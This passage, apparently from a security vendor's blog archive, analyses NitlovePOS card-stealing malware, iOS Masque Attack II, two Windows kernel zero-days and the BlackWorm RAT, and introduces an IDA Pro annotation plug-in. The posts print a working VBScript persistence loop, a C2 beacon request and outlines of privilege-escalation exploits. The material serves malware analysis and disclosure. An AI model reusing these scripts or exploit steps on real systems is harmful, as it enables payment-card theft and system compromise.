    Time Stamp                      : 2015:05:20 09:02:54-07:00

    PE Type                         : PE32

    File Description                : TAPIBrowser MFC Application

    File Version                    : 1, 0, 0, 1

    Internal Name                   : TAPIBrowser

    Legal Copyright                 : Copyright (C) 2000

    Legal Trademarks                :

    Original Filename               : TAPIBrowser.EXE

    Private Build                   :

    Product Name                    : TAPIBrowser Application

    Product Version                 : 1, 0, 0, 1:

The structure of the file is awkward; it contains only three sections (.rdata, .hidata and .rsrc), with the entry point located inside .hidata:

When executed, it will copy itself to disk using a well-known hiding technique, NTFS Alternate Data Streams (ADS), as:

    ~\Local Settings\Temp:defrag.scr

It will then create a VBScript file and save it to disk, again using ADS:

    ~\Local Settings\Temp:defrag.vbs

By doing this, the files are not visible in the file system and therefore are more difficult to locate and detect.

Once the malware is running, the “defrag.vbs” script monitors for attempts to delete the malicious process via a WMI __InstanceDeletionEvent and will re-spawn the malware if the process is terminated. Here is the code contained within “defrag.vbs”:

Set f=CreateObject("Scripting.FileSystemObject")

Set W=CreateObject("WScript.Shell")

Do While True

If GetObject("winmgmts:Win32_Process").Create(W.ExpandEnvironmentStrings("""%TMP%:Defrag.scr"" -"),n,n,p)=0 Then

GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery("Select * From __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process' AND TargetInstance.ProcessID="&p).NextEvent

Else

W.Run(W.ExpandEnvironmentStrings("cmd /C /D type nul > %TMP%:Defrag.scr")), 0, true

Exit Do

End If

Loop


The malware ensures that it will run after every reboot by adding itself to the Run registry key:

    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\"Defrag" = wscript "C:\Users\ADMINI~1\AppData\Local\Temp:defrag.vbs"

NitlovePOS expects to be run with “-” as an argument; otherwise it won’t perform any malicious actions. This technique can help bypass some methods of detection, particularly those that leverage automation. Here is an example of how the malware is executed:

    \LOCALS~1\Temp:Defrag.scr" -

If the right argument is provided, NitlovePOS will decode itself in memory and start searching for payment card data. If it is not successful, NitlovePOS will sleep for five minutes and restart the searching effort.
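The argument-gating trick above can be sketched in a few lines. This is a minimal Python illustration of the evasion idea, not NitlovePOS code:

```python
# Illustration of argument gating: automated sandboxes that launch a
# sample with no arguments only ever see the benign path.
def run(argv):
    if len(argv) < 2 or argv[1] != "-":
        return "benign"   # what argument-less automated analysis observes
    return "payload"      # only reached with the expected "-" argument

print(run(["Defrag.scr"]))       # benign
print(run(["Defrag.scr", "-"]))  # payload
```

Because the persistence script always supplies the “-” argument, the gate costs the operators nothing while defeating naive dynamic analysis.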

NitlovePOS has three main threads:

    Thread 1:  SSL C2 Communications

    Thread 2: MailSlot monitoring, waiting for payment card data

    Thread 3: Memory Scraping

Thread 1:  C2 Communications

NitlovePOS is configured to connect to one of three hardcoded C2 servers:




All three of these domains resolve to the same IP address: This IP address is assigned to a network located in St. Petersburg, Russia.

As soon as NitlovePOS starts running on the compromised system, it will initiate a callback via SSL:

    POST /derpos/gateway.php HTTP/1.1

    User-Agent: nit_love<GUID>


    Content-Length: 41

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache



    <computer name>

    <OS Version>


The User-Agent header contains a hardcoded string “nit_love” and the Machine GUID, which is not necessarily unique but can be used as an identifier by the cybercriminals. The string “HWAWAWAWA” is hardcoded and may be a unique campaign identifier; the “F.r.” is calculated per infected host.
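That hardcoded marker makes the beacon a convenient network indicator. A minimal matching sketch follows; the exact formatting of the GUID within the User-Agent (braces, case) is an assumption:

```python
import re

# The beacon's User-Agent is the hardcoded string "nit_love" followed by
# the Machine GUID. Optional braces and either hex case are allowed here
# because the exact GUID rendering is not documented.
GUID = r"\{?[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}?"
UA_PATTERN = re.compile(r"^nit_love" + GUID + r"$")

def is_nitlove_beacon(user_agent: str) -> bool:
    return bool(UA_PATTERN.match(user_agent))

print(is_nitlove_beacon("nit_love1cc18a1d-16a3-44f8-9d22-0093e4a99d57"))  # True
print(is_nitlove_beacon("Mozilla/5.0"))                                   # False
```

Since the callback travels over SSL, this check applies only where TLS is terminated or the header is otherwise visible (e.g., an intercepting proxy).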

Thread 2: MailSlot monitoring waiting for payment card data

A mailslot is basically a shared range of memory that can be used to store data; the process creating the mailslot acts as the server and the clients can be other hosts on the same network, local processes on the machine, or local threads in the same process.

NitlovePOS uses this feature to store payment card information; the mailslot name that is created comes as a hardcoded string in the binary (once de-obfuscated):


Once the mailslot is created, an infinite loop will keep querying the allocated space.

Thread 3: Memory Scraping

NitlovePOS scans running processes for payment data but will skip “System” and “System Idle Process.” It will try to match track 1 or track 2 data and, if found, will write the data into the mailslot created by Thread 2. This information is then sent via POST to the C2 over SSL, which makes network-level detection more difficult.
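As a rough illustration of what such memory scraping looks for, the following Python sketch matches track-1/track-2 patterns in a buffer. The regular expressions are simplified from the ISO/IEC 7813 field layouts and are not NitlovePOS’s actual patterns; real scrapers typically also Luhn-check the candidate PAN to cut false positives:

```python
import re

# Simplified track-1 / track-2 patterns (based on ISO/IEC 7813 layouts).
TRACK1 = re.compile(rb"%B(\d{13,19})\^([A-Z /.]{2,26})\^(\d{7,})\?")
TRACK2 = re.compile(rb";(\d{13,19})=(\d{7,})\?")

def find_track_data(buf: bytes):
    """Return (track, PAN) pairs found in a process-memory buffer."""
    hits = [("track1", m.group(1)) for m in TRACK1.finditer(buf)]
    hits += [("track2", m.group(1)) for m in TRACK2.finditer(buf)]
    return hits

# 4111111111111111 is a well-known test PAN, not real card data.
sample = b"noise;4111111111111111=15121011000012345678?noise"
print(find_track_data(sample))  # [('track2', b'4111111111111111')]
```

The same patterns are useful defensively: scanning process memory on POS hosts for track-format strings is one way to detect scraping activity or insecure card handling.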

Possible Control Panel

During our research we observed what appears to be a test control panel on a different, but probably related, server that matches NitlovePOS. This panel is called “nitbot,” which is similar to the “nit_love” string found in the binary, and was located in a directory called “derpmo,” which is similar to the “derpos” used in this case.


The information contained in the NitlovePOS beacon matches the fields displayed in the Nitbot control panel. These include the machine’s GUID transmitted in the User-Agent header, as well as the identifier “HWAWAWAWA,” which aligns with the “group name” the cybercriminals can use to track various campaigns.

The control panel contains a view that lists the “tracks,” or stolen payment card data. This indicates that this panel is for malware capable of stealing data from POS machines that matches up with the capability of the NitlovePOS malware.


Even cybercriminals engaged in indiscriminate spam operations have POS malware available and can deploy it to a subset of their victims. Because POS malware families are so widely used, they are eventually discovered and detection rates increase. However, this is followed by the development of new POS malware with very similar functionality. Despite the similarity, detection levels for new variants are initially quite low, which gives the cybercriminals a window of opportunity to exploit the use of a new variant.

We expect that new versions of functionally similar POS malware will continue to emerge to meet the demand of the cybercrime marketplace.

iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking

In November of last year, we uncovered a major flaw in iOS we dubbed “Masque Attack” that allowed malicious apps to replace existing, legitimate ones on an iOS device via SMS, email, or web browsing. In total, we have notified Apple of five security issues related to four kinds of Masque Attacks. Today, we are sharing Masque Attack II in the series – part of which has been fixed in the recent iOS 8.1.3 security content update [2].

Masque Attack II includes bypassing iOS prompt for trust and iOS URL scheme hijacking. iOS 8.1.3 fixed the first part whereas the iOS URL scheme hijacking is still present.

An iOS app URL scheme “lets you communicate with other apps through a protocol that you define.” [1] By deliberately defining the same URL schemes used by other apps, a malicious app can still hijack the communications intended for those apps and mount phishing attacks to steal login credentials. Even worse than the first Masque Attack [3], attackers might be able to conduct Masque Attack II through an app in the App Store. We describe these two parts of Masque Attack II in the following sections.

Bypassing Prompt for Trust

When the user clicks to open an enterprise-signed app for the first time, iOS asks whether the user trusts the signing party. The app won’t launch unless the user chooses “Trust”. Apple suggested defending against Masque Attack with the aid of this “Don’t Trust” prompt [8]. We notified Apple that this was inadequate.

We find that when calling an iOS URL scheme, iOS launches the enterprise-signed app registered to handle the URL scheme without prompting for trust. It doesn’t matter whether the user has launched that enterprise-signed app before. Even if the user has always clicked “Don’t Trust”, iOS still launches that enterprise-signed app directly upon calling its URL scheme. In other words, when the user clicks on a link in SMS, iOS Mail or Google Inbox, iOS launches the target enterprise-signed app without asking for user’s “Trust” or even ignores user’s “Don’t Trust”. An attacker can leverage this issue to launch an app containing a Masque Attack.

By crafting and distributing an enterprise-signed malware that registers app URL schemes identical to the ones used by legitimate popular apps, an attacker may hijack legitimate apps’ URL schemes and mimic their UI to carry out phishing attacks, e.g. stealing the login credentials. iOS doesn’t protect users from this attack because it doesn’t prompt for trust to the user when launching such an enterprise-signed malware for the first time through app URL scheme. In Demo Video 1, we explain this issue with concrete examples.

We’ve also found other approaches to bypass the “Don’t Trust” protection through the iOS springboard. We confirmed these problems on iOS 7.1.2, 8.1.1, 8.1.2 and 8.2 beta. Recently Apple fixed these issues and acknowledged our findings with CVE-2014-4494 in the iOS 8.1.3 security content [2]. As measured by the App Store on Feb 2, 2015 [4], however, 28% of devices still use iOS version 7 or lower and remain vulnerable. Some of the 72% of devices running iOS 8 are also vulnerable, given that iOS 8.1.3 came out only in late January 2015. We encourage users to upgrade their iOS devices to the latest version as soon as possible.

Two Limited, Targeted Attacks; Two New Zero-Days

The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel; Microsoft assigned CVE-2014-4148 and CVE-2014-4113 to the vulnerabilities and addressed them in its October 2014 Security Bulletin.

FireEye Labs has identified 16 total zero-day attacks in the last two years – uncovering 11 in 2013 and five in 2014 so far.

Microsoft commented: “On October 14, 2014, Microsoft released MS14-058 to fully address these vulnerabilities and help protect customers. We appreciate FireEye Labs using Coordinated Vulnerability Disclosure to assist us in working toward a fix in a collaborative manner that helps keep customers safe.”

In the case of CVE-2014-4148, the attackers exploited a vulnerability in the Microsoft Windows TrueType Font (TTF) processing subsystem, using a Microsoft Office document to embed and deliver a malicious TTF to an international organization. Since the embedded TTF is processed in kernel-mode, successful exploitation granted the attackers kernel-mode access. Though the TTF is delivered in a Microsoft Office document, the vulnerability does not reside within Microsoft Office.

CVE-2014-4148 impacted both the 32-bit and 64-bit Windows operating systems listed in MS14-058, though the observed attacks targeted only 32-bit systems. The malware contained within the exploit has specific functions adapted to the following operating system platform categories:

  • Windows 8.1/Windows Server 2012 R2
  • Windows 8/Windows Server 2012
  • Windows 7/Windows Server 2008 R2 (Service Pack 0 and 1)
  • Windows XP Service Pack 3

CVE-2014-4113 rendered Microsoft Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, and Windows Server 2008/R2 vulnerable to a local Elevation of Privilege (EoP) attack. This means that the vulnerability cannot be used on its own to compromise a customer’s security. An attacker would first need to gain access to a remote system running any of the above operating systems before they could execute code within the context of the Windows Kernel. Investigation by FireEye Labs has revealed evidence that attackers have likely used variations of these exploits for a while. Windows 8 and Windows Server 2012 and later do not have these same vulnerabilities.

Information on the companies affected, as well as threat actors, is not available at this time. We have no evidence of these exploits being used by the same actors. Instead, we have only observed each exploit being used separately, in unrelated attacks.


About CVE-2014-4148





Microsoft has released security update MS14-058 that addresses CVE-2014-4148.

Since TTF exploits target the underlying operating system, the vulnerability can be exploited through multiple attack vectors, including web pages. In the past, exploit kit authors have converted a similar exploit (CVE-2011-3402) for use in browser-based attacks. More information about this scenario is available under Microsoft’s response to CVE-2011-3402: MS11-087.




This TTF exploit is packaged within a Microsoft Office file. Upon opening the file, the font will exploit a vulnerability in the Windows TTF subsystem located within the win32k.sys kernel-mode driver.

The attacker’s shellcode resides within the Font Program (fpgm) section of the TTF. The font program begins with a short sequence of instructions that quickly return. The remainder of the font program section is treated as unreachable code for the purposes of the font program and is ignored when initially parsing the font.

During exploitation, the attacker’s shellcode uses Asynchronous Procedure Calls (APC) to inject the second stage from kernel-mode into the user-mode process winlogon.exe (in XP) or lsass.exe (in other OSes). From the injected process, the attacker writes and executes a third stage (executable).

The third stage decodes an embedded DLL to, and runs it from, memory. This DLL is a full-featured remote access tool that connects back to the attacker.

Plenty of evidence supports the attackers’ high level of sophistication. Beyond the fact that the attack is a zero-day kernel-level exploit, the attack also showed the following:

  • a usable hard-coded area of kernel memory is used like a mutex to avoid running the shellcode multiple times
  • the exploit has an expiration date: if the current time is after October 31, 2014, the exploit shellcode will exit silently
  • the shellcode has implementation customizations for four different types of OS platforms/service pack levels, suggesting that testing for multiple OS platforms was conducted
  • the dropped malware individually decodes each string only when that string is used, to hinder analysis
  • the dropped malware is specifically customized for the targeted environment
  • the dropped remote access capability is full-featured and customized: it does not rely on generally available implementations (like Poison Ivy)
  • the dropped remote access capability is a loader that decrypts the actual DLL remote access capability into memory and never writes the decrypted remote access capability to disk


About CVE-2014-4113





Microsoft has released security update MS14-058 that addresses this vulnerability.


Vulnerability and Exploit Details


The 32-bit exploit triggers an out-of-bounds memory access that dereferences offsets from a high memory address and inadvertently wraps into the null page. In user-mode, memory dereferences within the null page are generally assumed to be non-exploitable: since the null page is usually not mapped (the exception being 16-bit legacy applications emulated by ntvdm.exe), null pointer dereferences simply crash the running process. In contrast, memory dereferences within the null page in the kernel are commonly exploitable because the attacker can first map the null page from user-mode, as is the case with this exploit. The steps taken for successful 32-bit exploitation are:



  1. Map the null page:




    1. ntdll!ZwAllocateVirtualMemory(…,BaseAddress=0x1, …)



  2. Build a malformed win32k!tagWND structure at the null page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode




    1. Callback overwrites EPROCESS.Token to elevate privileges



  5. Spawns a child process that inherits the elevated access token


32-bit Windows 8 and later users are not affected by this exploit. The Windows 8 Null Page protection prohibits user-mode processes from mapping the null page and causes the exploits to fail.

In the 64-bit version of the exploit, dereferencing offsets from a high 32-bit memory address does not wrap, as the resulting address is well within the addressable memory range of a 64-bit user-mode process. As such, the Null Page protection implemented in Windows versions 7 (after MS13-031) and later does not apply. The steps taken by the 64-bit exploit variants are:



  1. Map memory page:




    1. ntdll!ZwAllocateVirtualMemory(…)



  2. Build a malformed win32k!tagWND structure at the mapped page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode




    1. Callback overwrites EPROCESS.Token to elevate privileges



  5. Spawns a child process that inherits the elevated access token


64-bit Windows 8 and later users are not affected by this exploit. Supervisor Mode Execution Prevention (SMEP) blocks the attacker’s user-mode callback from executing within kernel-mode and causes the exploits to fail.
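The 32-bit versus 64-bit difference described above comes down to address truncation: adding an offset to a base pointer near the top of the 32-bit address space wraps around into the null page, while the same arithmetic in a 64-bit process does not. A minimal sketch, using illustrative (not the exploit's actual) addresses:

```python
def deref_addr(base: int, offset: int, bits: int) -> int:
    """Address actually touched when an offset is added to a base pointer."""
    mask = (1 << bits) - 1
    return (base + offset) & mask

base = 0xFFFFFFF0   # illustrative "high" address near the top of 32-bit space
offset = 0x11       # small positive offset applied by the dereference

print(hex(deref_addr(base, offset, 32)))  # 0x1 -- wraps into the null page
print(hex(deref_addr(base, offset, 64)))  # 0x100000001 -- no wrap on 64-bit
```

This is why mapping the null page from user-mode (step 1 above) gives the 32-bit attacker control over the memory the kernel ends up dereferencing, while the 64-bit variant simply maps the high page directly.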


Exploits Tool History


The exploits are implemented as a command line tool that accepts a single command line argument: a shell command to execute with SYSTEM privileges. This tool appears to be an updated version of an earlier tool. The earlier tool exploited CVE-2011-1249 and displayed the following usage message to stdout when run:


Usage:system_exp.exe cmd



Windows Kernel Local Privilege Exploits


The vast majority of samples of the earlier tool have compile dates in December 2009. Only two samples were discovered with compile dates in March 2011. Although the two samples exploit the same CVE, they carry a slightly modified usage message:


Usage:local.exe cmd



Windows local Exploits


The most recent version of the tool, which implements CVE-2014-4113, eliminates all usage messages.

The tool appears to have gone through at least three iterations over time. The initial tool and exploit are believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploit did, and may have been retained privately, not necessarily even by the same actors.

We would like to thank Barry Vengerik, Joshua Homan, Steve Davis, Ned Moran, Corbin Souffrant, Xiaobo Chen for their assistance on this research.

FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts from our GitHub repository. We hope you find all these scripts as useful as we do.




During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.




The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.




Table 1 shows the benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments are pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument, and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA, and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in and the support it offers to an analyst.

The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.


Table 1: Automatic labelling of standard symbolic constants
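Under the hood, renaming a constant like this boils down to matching the argument's bit flags against the relevant enumeration. A minimal sketch of the idea, using the documented Win32 generic access-right values (the lookup-table approach here is an illustration, not the plug-in's actual code):

```python
# Win32 generic access rights (values from the Windows SDK headers).
GENERIC_FLAGS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}

def label_access_mask(value: int) -> str:
    """Render an access mask as OR'ed symbolic names, or hex if none match."""
    names = [name for bit, name in GENERIC_FLAGS.items() if value & bit]
    return " | ".join(names) if names else hex(value)

print(label_access_mask(0x40000000))  # GENERIC_WRITE
```

In the disassembly of Table 1, this is exactly the transformation that turns the raw operand 40000000h into GENERIC_WRITE.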

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over the automatically renamed dwShareMode constant displays descriptive information.







Figure 1: Hovering function names, arguments and constants displays the respective descriptions


How it works


Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong.

The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.


Figure 2: Annotated import table

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.


Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.


Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.


Figure 5: Descriptions added to the constant enumeration members


Preparing the MSDN database file


The plug-in’s graphical interface requires you to have the Qt framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here.

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository together with the annotation plug-in.

You can take the following steps to set up the database file. You only have to do this once.



  1. Download and install an offline version of the MSDN documentation. The Microsoft Windows SDK MSDN documentation works well: although it is not the newest SDK version, it includes all the needed information and data extraction is straightforward. As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.



    Figure 6: Installing a local copy of the MSDN documentation


  2. Extract the files with an archive manager like 7-zip to a directory of your choice.
  3. Download and extract tilib.exe from Hex-Rays’ download page.


    To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents; it is available via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly.

  4. Run MSDN_crawler/ <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>



    With these prerequisites fulfilled, you can run the crawler script located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution, the final XML database file should be located in the MSDN_data directory.



You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File - Script file... (ALT + F7) to open the plug-in script. This will display the dialog box shown in Figure 7, which allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions and arguments and renames constants. If you change the settings and execute the plug-in by clicking OK, your settings are stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you choose not to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element.


Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.


Figure 8: The plug-in’s preview of function annotations with repeatable comments


Similar Tools and Known Limitations


Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development.

Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element.

For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.

















<?xml version="1.0" encoding="ISO-8859-1"?>
<constants enums="MACRO_GENERIC">
  <description>All possible access rights</description>
  <description>Execute access</description>
  <description>Write access</description>
  <description>Read access</description>
</constants>

Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function
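A supplemental file like Listing 1 is matched against existing entries by its name tags. The following sketch shows how such a fragment could be indexed by name with the standard library; the `<constant>`/`<name>` element layout here is an assumption for illustration, since the authoritative schema lives in the generated msdn_data.xml:

```python
import xml.etree.ElementTree as ET

# Hypothetical supplemental fragment; the tag layout is assumed, not taken
# from the plug-in's actual schema.
supplement = """
<constants enums="MACRO_GENERIC">
  <constant>
    <name>GENERIC_WRITE</name>
    <description>Write access</description>
  </constant>
</constants>
"""

def index_by_name(xml_text: str) -> dict:
    """Map each constant's mandatory <name> tag to its description."""
    root = ET.fromstring(xml_text)
    return {c.findtext("name"): c.findtext("description")
            for c in root.iter("constant")}

print(index_by_name(supplement))
```

Keying on the name tag is what lets a partial supplemental entry extend an existing function or constant record rather than replace it.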




In this post, we showed how you can generate a MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process!

Stay tuned for the FLARE Team’s next post, where we will release solutions for the FLARE On Challenge.


Connecting the Dots: Syrian Malware Team Uses BlackWorm for Attacks

The Syrian Electronic Army has made news for its recent attacks on major communications websites, Forbes, and an alleged attack on CENTCOM. While these attacks garnered public attention, the activities of another group - The Syrian Malware Team - have gone largely unnoticed. The group’s activities prompted us to take a closer look. We discovered this group using a .NET based RAT called BlackWorm to infiltrate their targets.

The Syrian Malware Team is largely pro-Syrian-government, as seen in one of their banners featuring Syrian President Bashar al-Assad. Based on the sentiments publicly expressed by this group, it is likely that they are either directly or indirectly involved with the Syrian government. Further, certain members of the Syrian Malware Team have ties to the Syrian Electronic Army (SEA), which is known to be linked to the Syrian government. This indicates that the Syrian Malware Team may be an offshoot or part of the SEA.


Banner used by the Syrian Malware Team

BlackWorm Authorship

We found at least two distinct versions of the BlackWorm tool, including an original/private version (v0.3.0) and the Dark Edition (v2.1). The original BlackWorm builder was co-authored by Naser Al Mutairi from Kuwait, better known by his online moniker 'njq8'. He is also known to have coded njw0rm, njRAT/LV, and earlier versions of H-worm/Houdini. We found his code being used in a slew of other RATs such as Fallaga and Spygate. BlackWorm v0.3.0 was also co-authored by another actor, Black Mafia.


About section within the original version of BlackWorm builder

Within the underground development forums, it’s common for threat actors to collaborate on toolsets. Some write the base tools that other attackers can use; others modify and enhance existing tools.

The BlackWorm builder v2.1 is a prime example of actors modifying and enhancing current RATs. After njq8 and Black Mafia created the original builder, another author, Black.Hacker, enhanced its feature set.


About section within BlackWorm Dark Edition builder


Black.Hacker's banner on social media


As an interesting side note, 'njq8' took down his blog in recent months and announced a cease in all malware development activity on his Twitter and Facebook account, urging others to stop as well. This is likely a direct result of the lawsuit filed against him by Microsoft.

BlackWorm RAT Features

The builder for BlackWorm v0.3.0 is fairly simple and allows for very quick payload generation, but doesn’t allow any configuration other than the IP address for command and control (C2).


Building binary through BlackWorm v0.3.0


BlackWorm v0.3.0 controller

BlackWorm v0.3.0 supports the following commands between the controller and the implant:

  • ping - Checks if the victim is online
  • closeserver - Exits the implant
  • restartserver - Restarts the implant
  • sendfile - Transfers and runs a file from the server
  • download - Downloads and runs a file from a URL
  • ddos - Ping-floods a target
  • msgbox - Message interaction with the victim
  • down - Kills critical Windows processes
  • blocker - Blocks a specified website by pointing its resolution to
  • logoff - Logs out of Windows
  • restart - Restarts the system
  • shutdown - Shuts down the system
  • more - Disables Task Manager, registry tools, and System Restore; also blocks keyboard and mouse input
  • hror - Displays a startling flash video

In addition to the features supported by the command structure, the payload can:

  • Seek and kill no-ip processes DUC30 and DUC20
  • Disable Task Manager to kill process dialog
  • Copy itself to USB drives and create autorun entries
  • Copy itself to common peer-to-peer (P2P) share locations
  • Collect system information such as OS, username, hostname, presence of camera, active window name, etc., to display in the controller
  • Kill the following analysis processes (if found):
    • procexp
    • SbieCtrl
    • SpyTheSpy
    • SpeedGear
    • Wireshark
    • MBAM
    • ApateDNS
    • IPBlocker
    • cPorts
    • ProcessHacker
    • AntiLogger

The Syrian Malware Team primarily uses another version of BlackWorm called the Dark Edition (v2.1). BlackWorm v2.1 was released on a prolific underground forum where information and code is often shared, traded and sold.


BlackWorm v2.1 has the same abilities as the original version, plus additional functionality including bypassing UAC, disabling host firewalls, and spreading over network shares. Unlike its predecessor, it also allows for granular control of the features available within the RAT. These additional controls allow the RAT user to enable and disable features as needed. Binary output can also be generated in multiple formats, such as .exe, .scr, and .dll.


BlackWorm Dark Edition builder

Syrian Malware Team

We observed activity from the Syrian Malware Team going as far back as Jan. 1, 2011. Based on Facebook posts, they are allegedly directly or indirectly involved with the Syrian government. Their Facebook page shows they are still very active, with a post as recent as July 16, 2014.


Syrian Malware Team’s Facebook page

The Syrian Malware Team has been involved in everything from profiling targets to orchestrating attacks themselves. There are seemingly multiple members, including:

Partial list of self-proclaimed Syrian Malware Team members

Some of these people have posted malware-related items on Facebook.


Facebook posting of virus scanning of files

While looking for Dark Edition samples, we discovered a binary named svchost.exe (MD5: 015c51e11e314ff99b1487d92a1ba09b). We quickly saw indicators that it was created by BlackWorm Dark Edition.


Configuration options within code

The malware communicated out to, over port 5050, with a command structure of:

!0/j|n\12121212_64F3BF1F/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n\2.4.0 [ Dark Edition]/j|n\/j|n\{ActiveWindowName}/j|n\[endof]

When looking at samples of Dark Edition BlackWorm being used by the Syrian Malware Team, the strings “Syrian Malware,” or “Syrian Malware Team” are often used in the C2 communications or within the binary strings.
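The beacons shown above are delimiter-separated records: fields split on the literal sequence /j|n\ and terminated by [endof]. A sketch of parsing such a beacon follows; the field labels are inferred from the observed template and should be treated as guesses:

```python
DELIM = "/j|n\\"   # the literal delimiter /j|n\ seen in BlackWorm traffic

# Sample beacon assembled from the observed template (hostname, user, and
# window name are placeholders, not real victim data).
beacon = ("!0" + DELIM + "12121212_64F3BF1F" + DELIM + "HOSTNAME" + DELIM +
          "user" + DELIM + "USA" + DELIM + "Win 7 Professional SP1 x86" +
          DELIM + "No" + DELIM + "2.4.0 [ Dark Edition]" + DELIM + DELIM +
          "Notepad" + DELIM + "[endof]")

def parse_beacon(data: str) -> dict:
    """Split a BlackWorm-style beacon into labeled fields (labels inferred)."""
    if data.endswith("[endof]"):
        data = data[: -len("[endof]")]
    fields = data.split(DELIM)
    return {
        "id": fields[1],        # campaign/implant identifier
        "host": fields[2],
        "user": fields[3],
        "country": fields[4],
        "os": fields[5],
        "version": fields[7],
        "window": fields[9],    # active window name
    }

print(parse_beacon(beacon)["host"])  # HOSTNAME
```

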